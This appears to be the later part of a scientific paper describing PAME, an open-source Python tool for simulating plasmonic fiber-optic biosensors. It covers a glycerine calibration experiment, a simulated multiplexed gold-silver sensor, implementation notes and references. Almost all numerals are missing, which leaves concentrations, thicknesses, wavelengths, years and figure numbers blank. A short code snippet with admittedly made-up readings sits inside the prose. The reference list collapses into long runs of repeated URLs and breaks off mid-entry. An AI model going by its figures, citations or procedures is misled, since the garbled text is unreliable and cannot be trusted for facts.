as a first use case, pame is used to calibrate sensor response to increasing concentrations of glycerine for an axial fiber comprised of a nm layer of gold nanoparticles. a dip sensor was constructed using a protocol and optical setup similar to that of mitsui, handa & kajikawa ( ). in brief, optical fiber probes were cleaved, submerged in boiling piranha solution ( : h2so4:h2o2), functionalized with . % ( -aminopropyl)trimethoxysilane for min in anhydrous ethanol under sonication, dried in an oven at °c, and coated with nm aunps to a coverage of about ± %, as verified by sem imaging (hughes et al., ). the fiber was submerged in ml of distilled water under constant stirring, and glycerine droplets were added incrementally until the final glycerine concentration was %, with each drop resulting in a stepwise increase in the reflectance, as shown in figs. a and c. this system was simulated using the stack described in fig. , where the organosilanes were modeled as a nm-thick layer of a sellmeier material (the dispersion relation given above), with coefficients a = . , a = . , a = . , b = . , b = . , b = . . these coefficients led to excellent agreement between experiment and simulation during the self-assembly process of the aunp film. figures c and d show the strong agreement between measured and simulated response to increasing glycerine, and pame is able to show the reflectance spectrum free of the influence of the led light source in the dataset (panels a and b). it is clear that while the nanoparticle's reflectance is prominent around λmax ≈ nm, the combination of both an increase in reflectance and a blue-shift of spectral weight yields a nm peak in the normalized reflectance spectrum.
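the calibration step described above, converting glycerine concentration into refractive index units, can be sketched as follows. the endpoint indices of water and glycerine and the linear interpolation between them are common approximations (not values quoted in the text), and the signal readings are made up for illustration.

```python
import numpy as np

N_WATER = 1.333       # approximate index of distilled water at visible wavelengths
N_GLYCERINE = 1.473   # approximate index of pure glycerine (literature value)

def glycerine_index(weight_fraction):
    """Rough index of a water-glycerine mixture, linearly interpolated between
    the pure endpoints (tabulated data would be used for careful work)."""
    return N_WATER + (N_GLYCERINE - N_WATER) * weight_fraction

# suppose the sensor's normalized reflectance was recorded at these fractions
fractions = np.array([0.00, 0.02, 0.04, 0.06, 0.08, 0.10])
signal = np.array([1.000, 1.012, 1.025, 1.037, 1.049, 1.062])   # made-up readings

indices = glycerine_index(fractions)
sensitivity_riu = np.polyfit(indices, signal, 1)[0]   # slope: signal change per RIU
print("sensitivity ~ %.1f (normalized reflectance) per RIU" % sensitivity_riu)
```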
neither is indicative of the free-solution plasmon resonance peak at λmax ≈ nm, and maintaining a correspondence between the reflectance centroid and the plasmon resonance can lead to misinterpretation. furthermore, the shape of this glycerine response profile is very sensitive to parameters like organosilane layer thickness and nanoparticle size and coverage, and by fitting to the simulated response, one may then estimate these parameters, which are otherwise difficult to measure. this simple example provides valuable insights into the relationship between glycerine concentration and reflectance on a dip sensor.

figure : simulated and measured spectral reflectance from a fiberoptic biosensor. increase in spectral reflectance (Γ) from a fiber dip sensor at % aunp coverage immersed in a water–glycerine mixture as the glycerine fraction is increased from to % for the experiment (a) and simulation (b); the same response, normalized to the reflectance of the probe in water (Γo) prior to the addition of glycerine (c, d). the aunp layer reflects most strongly at λmax ≈ nm, yet the normalized reflectance peaks at λmax ≈ nm.

case : multiplexed ag–au sensor

sciacca & monro ( ) recently published a multiplexed biosensor in which both gold and silver nanoparticles were deposited on the endface of a dip sensor and their reflectance was monitored simultaneously. in their experiment, the gold colloids were functionalized with anti-apoe, the antibody to an overexpressed gastric cancer biomarker, apoe. the silver colloids were functionalized with a non-specific antibody. the authors showed that the plasmon resonance peak of the gold particles shifted appreciably in response to apoe, while the silver did not. furthermore, the gold peak did not respond to clu, an underexpressed gastric cancer biomarker, while the uncoated silver particles did, presumably due to non-specific binding. in effect, the multiplexed sensor provides a built-in negative control and can identify specific events more robustly. the ability to multiplex two or more colloids on a single sensor has great potential. to gain insights into this system, the sensor's response to a mid-sized protein like neutravidin ( kda) was simulated (the neutravidin simulation is an idealization of sciacca & monro ( )'s configuration, as it only considers a single protein layer rather than an antigen–antibody bilayer). to our knowledge, this is the first attempt at modeling a multiplexed dip sensor containing two nanoparticle species.

figure : simulation of multiplexed biosensor response. simulation of a multiplexed biosensor with a combined nm gold and nm silver nanoparticle layer. simulated neutravidin binding to agnps (a, c) while aunps are kept bare, and vice versa (b, d). the coverage is varied until % of the available sites are occupied ( proteins per aunp, per agnp). the reflectance normalized to zero coverage (Γo) is shown in (c, d).

a dip sensor was configured in pame, composed of a . nm thick layer of organosilanes and a nm layer of mixed protein-coated nanoparticles in water. (sciacca & monro ( ) actually used a thick layer of pah to bind the nanoparticles; it was unclear how best to model this material, so the organosilane layer from the previous example was used.
the thickness of the pah layer might explain why sciacca & monro ( )'s silver reflectance is peaked at λmax ≈ nm, whereas our simulation and other reported silver nanoparticle films (hutter & fendler, ) exhibit maxima at λmax ≈ nm.) a two-layer composite material model was used to represent the mixed nanoparticles. materials and were set to nm aunps and nm agnps, respectively, using the dielectric functions described in fig. ; material was set to water. au–au and ag–ag effects are taken into account, but pame's two-phase emts cannot account for au–ag effects (three-phase and n-phase emts (luo, ; zhdanov, ) will be implemented in upcoming releases). therefore, the combined layer, ñ_auag, is weighted in proportion to the fill fractions as ñ_auag = φ_au ñ_au + φ_ag ñ_ag. nanoparticle coverage was chosen so as to produce a large reflectance, with approximately equal contributions from gold and silver; the actual coverage used in sciacca & monro ( ) is not stated. ultimately, . % of the surface sites were covered in gold and . % in silver. neutravidin was modeled as a nm sphere (tsortos et al., ) of dispersive refractive index, n ≈ . (sarid & challener, ), filling a nm-wide shell on the nanoparticles from to % coverage ( proteins per aunp and per agnp), as shown in fig. .

despite using several approximations, the simulation provides many insights into multiplexed sensors. first, the nm agnps reflect much more efficiently, despite agnps and aunps having nearly identical extinction cross sections (fig. ). this is because silver particles are more efficient scatterers (lee & el-sayed, ), and reflectance depends exponentially on the scattering cross section (quinten, ). therefore, reflectance sensors composed of highly-scattering particles can utilize sparse nanoparticle films, which are less susceptible to aggregation (scarpettini & bragas, ) and electrostatic and avidity effects. secondly, the normalized response to protein binding is about . units for silver and . for gold; however, there are . times more proteins on gold than silver. therefore, considering the response per molecule, nm silver spheres are . times more sensitive to protein binding than nm gold spheres. experiments have confirmed a similar three-fold enhancement in protein-induced plasmon resonance shifts in aqueous solutions of aunps and agnps (sun & xia, ; mayer, hafner & antigen, ). this suggests a correspondence between shifts measured in free solution and the reflectance in optical fibers, despite little similarity in the qualitative profile of the response. nusz et al. ( ) has suggested a figure of merit to objectively compare shift vs. intensity responses. finally, if the response is partitioned into two spectral regions, such that nm < λ ≤ nm corresponds to silver and λ ≥ nm to gold, then fig. illuminates an important result: despite a clear separation in the peaks of the reflectance spectra, the response to neutravidin spans both partitions. for example, in fig. c the gold region (λ ≥ nm) clearly responds to proteins binding to silver nanoparticles. this could lead to misinterpretations; for example, the response at λ ≈ nm could be misattributed to non-specific binding onto gold, when in fact there is only binding to silver. in sciacca & monro ( ), both the gold and silver spectral regions responded to apoe, when only gold is coated with anti-apoe.
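the fill-fraction weighting used for the combined au–ag layer amounts to a one-line combination of two single-species effective indices. in the sketch below the indices are placeholders, au–ag coupling is neglected as the text notes, and the normalization of the weights (so the two species' contributions sum to one) is my reading of "weighted in proportion to the fill fractions" rather than a detail stated in the text.

```python
def combined_index(n_au_layer, n_ag_layer, phi_au, phi_ag):
    """Fill-fraction-weighted effective index of a mixed Au/Ag nanoparticle layer:
    n_AuAg = phi_Au * n_Au + phi_Ag * n_Ag, with the weights normalized so that
    the two species' contributions sum to one. Au-Ag coupling is ignored."""
    total = phi_au + phi_ag
    return (phi_au * n_au_layer + phi_ag * n_ag_layer) / total

# placeholder effective indices for the two single-species layers in water
n_au = 1.55 + 0.35j
n_ag = 1.50 + 0.55j
print(combined_index(n_au, n_ag, phi_au=0.035, phi_ag=0.021))
```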
while the signal in the silver region could be due to non-specific interactions between the anti-apoe and agnps, these simulations show that it could simply be due to spectral overlap in the gold and silver response, the extent of which depends on the dielectric function of the protein, the au–ag coupling and other factors.

implementation and performance

pame's graphical interface and event-handling framework are built on the enthought tool suite, especially traits and traitsui. traits is particularly useful for rapid application development (varoquaux, ). traitsui leverages either pyqt, pyside or wxpython on the backend to generate the graphical interface. some discrepancies in the user interface may be encountered between different backends, and possibly between operating systems; pame has been tested on ubuntu, osx and windows . a future refactor to supplant traitsui with enaml (nucleic development team, ) should resolve view inconsistencies. to enhance speed, pame utilizes numpy (oliphant, ) and pandas to vectorize most of its computations. complex structures such as multilayers of or more materials, with over a thousand datapoints per sample, are reasonably handled on a low-end laptop (intel core duo, gb ddr ram). the intended operating conditions for pame are stacks of fewer than layers, and dispersive media of or fewer datapoints. at present, the main performance bottleneck is redundant event triggering. because pame is highly interactive, changing a global parameter such as the working spectral range will trigger updates in every material in the multilayer stack. for nanoparticles, this means the core, medium and possibly shell materials are all recomputed, each of which triggers a separate recalculation and redraw of the mie-scattering cross sections. streamlining global event handlers should yield appreciable performance gains, followed by additional vectorization of the tmm calculation, and finally implementing calculations that cannot be vectorized in cython (behnel et al., ).

future improvements

currently, pame's nanoparticle support is limited to nanospheres and core–shell particles because analytical solutions to these systems exist, and because many effective medium approximations are implemented with spheres in mind. the electromagnetic properties of nanoparticles of arbitrary morphology can be solved with numerical methods such as dda, fdtd or bem, and libraries like mnpbem implement common particle morphologies out-of-the-box. the recently released pygbe (cooper, bardhan & barba, ) library brings this potential to python. pygbe has been used to simulate protein interactions near the surface of materials (lin, liu & wang, ), meaning it has the potential to supplant the current geometrical fill models used to describe protein-nanoparticle interactions. by analyzing interactions in the near-field with pygbe and in the far-field with pame, comprehensive insights into nanoparticle systems may be obtained. even if exotic nanoparticles are incorporated into pame, they would still need to be homogenized through an effective mixing theory to fit the tmm multilayer model.
while classical emts can account for non-spherical inclusions through a dipole polarizability parameter (garcía, llopis & paje, ; quinten, ), modern two-material emts derived from spectral density theory (bergman, ; sancho-parramon, ; lans, ), n-material generalized tensor formulations (habashy & abubakar, ; zhdanov, ) and multipole treatments (malasi, kalyanaraman & garcia, ) give better descriptions of real film topologies, and will be incorporated into pame in the near future. some systems cannot be adequately described with emts, for example films composed of large, highly-scattering particles (quinten, ). in such cases, it is still possible to compute the reflectance of a film of a few hundred spheres through generalized mie theory, which is a coherent superposition of the multipole moments of each particle, or for larger films using incoherent superposition methods (elias & elias, ; quinten, ), but such approaches do not readily interface with the multilayer model. rigorous coupled-wave analysis (rcwa) may be a viable alternative, as it incorporates periodic dielectric structures (moharam et al., ) directly into tmm calculations, and is already implemented in python (rathgen, ; francis, ). rcwa could be integrated into pame without major refactoring, and has already been demonstrated as a viable alternative to emts in describing nanoparticle-embedded films in biosensors (wu & wang, ).

conclusion

plasmonic biosensing offers a promising alternative to conventional label-free protein detection techniques like enzyme-linked immunosorbent assays (elisa) and western blots, but dedicated software tools for the common sensor geometries are not readily accessible. pame fills the gap by providing an open-source tool which combines aspects of thin-film design, effective medium theories and nanoscience to provide a modeling environment for biosensing. in this work, it has been shown that pame can simulate a refractometer made from a dip sensor of aunps, and experimental data shows good agreement without invoking extensive fit parameters. furthermore, pame is flexible enough to reproduce results on new multiplexed sensor designs like those proposed by lin et al. ( ) and sciacca & monro ( ). as plasmonic biosensors continue to develop, pame should prove a useful tool for characterizing sensor response, a necessary step towards in-situ studies.

about pame

documentation, source code, examples and video tutorials are hosted at https://github.com/hugadams/pame. we are looking for developers to help extend the project; please contact us if interested.
programming language: python .
license: -clause bsd
version: . .
dependencies: enthought tool suite, pandas, scipy (ipython ≥ . and scikit-spectra recommended)
os: windows, mac and linux
persistent identifier: doi . /zenodo.
binary installers: under development

acknowledgements

we'd like to thank robert kern and jonathan march for many helpful discussions on traits and traitsui, and rayhaan rasheed for helping to create the illustrations.

additional information and declarations

funding

this work was supported in part by the george gamow research fellowship, luther rice collaborative research fellowship programs, the george washington university (gwu) knox fellowship and the gwu presidential merit fellowship.
the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures

the following grant information was disclosed by the authors:
george gamow research fellowship.
luther rice collaborative research fellowship.
george washington university knox fellowship.
gwu presidential merit fellowship.

competing interests

the authors declare there are no competing interests.

author contributions

• adam hughes analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work.
• zhaowen liu analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work.
• mark e. reeves wrote the paper, reviewed drafts of the paper.

data availability

the following information was supplied regarding the deposition of related data:
source code is hosted on github: https://github.com/hugadams/pame
pame v. . . is archived on zenodo: doi . /zenodo.

references

amendola v, meneghetti m. . size evaluation of gold nanoparticles by uv–vis spectroscopy. journal of physical chemistry c : – doi . /jp .
anker jn, hall wp, lyandres o, shah nc, zhao j, duyne rpv. . biosensing with plasmonic nanosensors. nature publishing group (june): – .
attana. . immobilization of antibodies on the attana® carboxyl sensor chip surface. technical report. available at http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf.
barrow sj, wei x, baldauf js, funston am, mulvaney p. . the surface plasmon modes of self-assembled gold nanocrystals. nature communications : doi . /ncomms .
battie y, resano-garcia a, chaoui n, en naciri a. . optical properties of plasmonic nanoparticles distributed in size determined from a modified maxwell–garnett-mie theory. physica status solidi (c) : – doi . /pssc. .
behnel s, bradshaw r, dalcín l, florisson m, makarov v, seljebotn ds. . cython: c extensions for python. available at http://cython.org.
bergman dj. . the dielectric constant of a composite material in classical physics. physics reports c ( ): – doi . / - ( ) - .
bhatia sc, tripathi n, dubey gp. . refractive indices of binary liquid mixtures of (decane + benzene) and (hexadecane + benzene, or + hexane) at . , . and . k. indian journal of chemistry a: – .
bohren h. . absorption and scattering of light by small particles. hoboken: john wiley & sons, inc.
bossa j, isokoski k, paardekooper dm, bonnin m, linden epvd, triemstra t, cazaux s. . porosity measurements of interstellar ice mixtures using optical laser interference and extended effective medium approximations. astronomy and astrophysics : – doi . / - / .
brown lo, doorn sk. . optimization of the preparation of glass-coated, dye-tagged metal nanoparticles as sers substrates. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la f.
bruggeman d. . calculation of different physical constants of heterogeneous substances i: dielectric constant and conductivity of media of isotropic substances. annales de physique : – doi . /andp. .
byrnes s. . tmm. available at https://pypi.python.org/pypi/tmm.
chang t-c, wu c-c, wang s-c, chau l-k, hsieh w-h. . using a fiber optic particle plasmon resonance biosensor to determine kinetic constants of antigen–antibody binding reaction. analytical chemistry ( ): – doi . /ac n.
chen k, obinata h, izumi t. . detection of g protein-coupled receptor-mediated cellular response involved in cytoskeletal rearrangement using surface plasmon resonance. biosensors & bioelectronics ( ): – doi . /j.bios. . . .
cheng y, wang m, borghs g, chen h. . gold nanoparticle dimers for plasmon sensing. langmuir : – doi . /la m.
cooper cd, bardhan jp, barba la. . a biomolecular electrostatics solver using python, gpus and boundary elements that can handle solvent-filled cavities and stern layers. computer physics communications ( ): – doi . /j.cpc. . . .
elias m, elias g. . new and fast calculation for incoherent multiple scattering. journal of the optical society of america a ( ): – doi . /josaa. . .
enthought. . enthought tool suite. version . . . available at http://code.enthought.com/projects/.
fortebio. . octet platform. technical report. available at http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf.
francis em. . empy: electromagnetic python. available at http://lbolla.github.io/empy/.
freeman rg, grabar kc, allison kj, bright rm, davis ja, guthrie ap, hommer mb, jackson ma, smith pc, walter dg, natan mj. . self-assembled metal colloid monolayers: an approach to sers substrates. science ( ): – doi . /science. . . .
fujiwara k, kasaya h, ogawa n. . gold nanoparticle monolayer formation on a chemically modified glass surface. analytical sciences: the international journal of the japan society for analytical chemistry ( ): – doi . /analsci. . .
gao l, lemarchand f, lequime m. . comparison of different dispersion models for single layer optical thin film index determination. thin solid films ( ): – doi . /j.tsf. . . .
garcía ma, llopis j, paje se. . a simple model for evaluating the optical absorption spectrum from small au-colloids in sol–gel films. chemical physics letters : – doi . /s - ( ) - .
garnett j. . colours in metal glasses and in metallic films. philosophical transactions of the royal society : – doi . /rsta. . .
glycerine producers' association. . physical properties of glycerine and its solutions. new york: glycerine producers' association.
gupta bd, verma rk. . surface plasmon resonance-based fiber optic sensors: principle, probe designs, and some applications. journal of sensors : doi . / / .
https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm http://dx.doi.org/ . /ac n http://dx.doi.org/ . /j.bios. . . http://dx.doi.org/ . /la m http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . /josaa. . http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? 
http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? 
http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? 
http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /analsci. . http://dx.doi.org/ . /j.tsf. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. habashy tm, abubakar a. . formulation for modeling of the electromagnetic fields. journal of electromagnetic waves and applications ( ): – . haes a, change l, klein w, van duyne r. . detection of a biomarker for alzheimer’s disease from synthetic and clinical samples using a nanoscale optical biosensor. jacs : – doi . /ja q. hagemann h-j, gudat w, kunz c. . optical constants from the far infrared to the x-ray region: mg, al, cu, ag, au, bi, c, and al o . journal of the optical society of america ( ): – doi . /josa. . . hohenester u, trugler a. . mnpbem: a matlab toolbox. computer physics communications : – doi . /j.cpc. . . . hughes a, liu z. . scikit-spectra: tools for explorative spectroscopy. available at http:// hugadams.github.io/scikit-spectra/. hughes a, liu z, raftari m, reeves me. . a workflow for characterizing nanoparticle monolayers for biosensors: machine learning on real and artificial sem images. peerj preprints :e v doi . /peerj.preprints. v . hutter e, fendler jh. . size quantized formation and self-assembly of gold encased silver nanoparticles. chem communication : – doi . /b b. issa na, guckenberger r. . optical nanofocusing on tapered metallic waveguides. plasmonics ( ): – doi . /s - - - . jain pk, lee ks, el-sayed ih, el-sayed ma. . calculated absorption and scattering properties of gold nanoparticles of different size, shape, and composition: applications in biological imaging and biomedicine. the journal of physical chemistry b ( ): – doi . /jp o. jans h, liu x, austin l, maes g, huo q. . dynamic light scattering as a powerful tool for gold nanoparticle bioconjugation and biomolecular binding studies. analytical chemistry ( ): – doi . /ac w. jeong h-h, erdene n, park j-h, jeong d-h, lee s-k. . analysis of fiber-optic localized surface plasmon resonance sensor by controlling formation of gold nanoparticles and its bio-application. journal of nanoscience and nanotechnology : – doi . /jnn. . . jeong hyeon-ho, lee s-k. . the method of measurement signal processing of biosensor based on optical fiber using reflected localized surface plasmon resonance. journal of sensor science and technology ( ): – doi . /jsst. . . . . johnson p, christy r. . optical constants of noble metals. physical review b ( ): – doi . /physrevb. . . jong whd. . drug delivery and nanoparticles: applications and hazards. 
